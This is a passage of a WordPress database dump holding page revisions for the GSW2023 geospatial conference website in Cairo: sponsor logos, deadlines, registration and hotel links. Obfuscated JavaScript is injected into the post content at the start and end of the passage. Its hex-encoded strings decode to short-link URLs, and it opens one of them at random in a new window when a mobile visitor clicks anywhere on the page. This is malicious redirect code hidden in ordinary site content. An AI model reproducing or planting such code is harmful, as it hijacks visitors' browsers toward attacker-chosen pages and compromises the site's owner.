_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 04:26:19','2023-05-17 04:26:19','',3066,'https://gsw2023.com/?p=4510',0,'revision','',0),
(4511,1,'2023-05-17 04:27:22','2023-05-17 04:27:22','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOU HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h4>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 